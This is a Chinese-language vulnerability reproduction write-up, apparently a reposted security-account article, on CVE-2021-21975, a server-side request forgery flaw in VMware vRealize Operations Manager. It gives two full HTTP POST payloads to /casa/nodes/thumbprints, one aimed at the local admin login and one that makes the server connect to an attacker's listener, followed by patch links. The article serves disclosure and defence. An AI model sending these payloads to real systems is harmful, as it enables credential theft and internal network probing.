CVE-2021-21975：VMware vRealize SSRF复现

CVE-2021-21975：VMware vRealize SSRF复现
2021-05-06 11:11:56 Author: mp.weixin.qq.com(查看原文) 阅读量:118 收藏

文章来源： Timeline Sec

0x01 简介

vRealize Operations Manager 提供跨物理、虚拟和云基础架构的智能运维管理以及从应用程序到存储的可见性。使用基本策略的自动化，操作团队实现关键过程的自动化并提高 IT 效率。

0x02 漏洞概述

编号：CVE-2021-21975

此漏洞是vRealize Operations API管理器中的服务器端请求伪造（SSRF）漏洞，该漏洞可能允许未经身份验证的远程攻击者窃取管理密码。VMware将漏洞指定为“重要”严重等级，CVSSv3评分为8.6。

0x03 影响版本

VMware vRealize Operations 8.3.0、8.2.0、8.1.1、8.1.0、7.5.0

VMware Cloud Foundation 4.x、3.x

vRealize Suite Lifecycle Manager 8.x

0x04 环境搭建

漏洞环境下载地址：

https://my.vmware.com/zh/group/vmware/patch#search

访问生成的地址：

https://192.168.3.6

0x05 漏洞复现

验证1:服务端请求登录

POST /casa/nodes/thumbprints HTTP/1.1Host: 192.168.3.6Connection: closeCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CKi1yQEIlLbJAQijtskBCMS2yQEIqZ3KAQiOucoBCPjHygEIpM3KAQjc1coBCPDgygEI5JzLAQipncsBContent-Type: application/json;charset=UTF-8Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Content-Length: 36
["127.0.0.1:443/admin/login.action"]

验证2:vps监听

POST /casa/nodes/thumbprints HTTP/1.1Host: 192.168.3.6Connection: closeCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CKi1yQEIlLbJAQijtskBCMS2yQEIqZ3KAQiOucoBCPjHygEIpM3KAQjc1coBCPDgygEI5JzLAQipncsBContent-Type: application/json;charset=UTF-8Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Content-Length: 36
["vps:6666"]

0x06 修复方式

建议参考官方公告及时升级或安装相应补丁

下载链接：

https://kb.vmware.com/s/article/83210

参考链接：

https://www.vmware.com/security/advisories/VMSA-2021-0004.html

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21975

https://www.bleepingcomputer.com/news/security/vmware-fixes-bug-allowing-attackers-to-steal-admin-credentials/

精彩推荐

微信被爆出存在高危0day漏洞！新版本已修复，看到尽快更新！

湖南电信网络又崩了？疑似遭到境外黑客DDOS攻击，官方回复光缆故障

2021，越自律，越自由！网络安全就业班开班通知！

多一个点在看

多一条小鱼干

文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650510296&idx=3&sn=d872c201ab8dbfc64b9e31b144b9223b&chksm=83baf63cb4cd7f2ae0277cf9e5ab629fbc15e79f8d67ce3fff69391deb4e2f148050b96f0f87#rd
如有侵权请联系:admin#unsafe.sh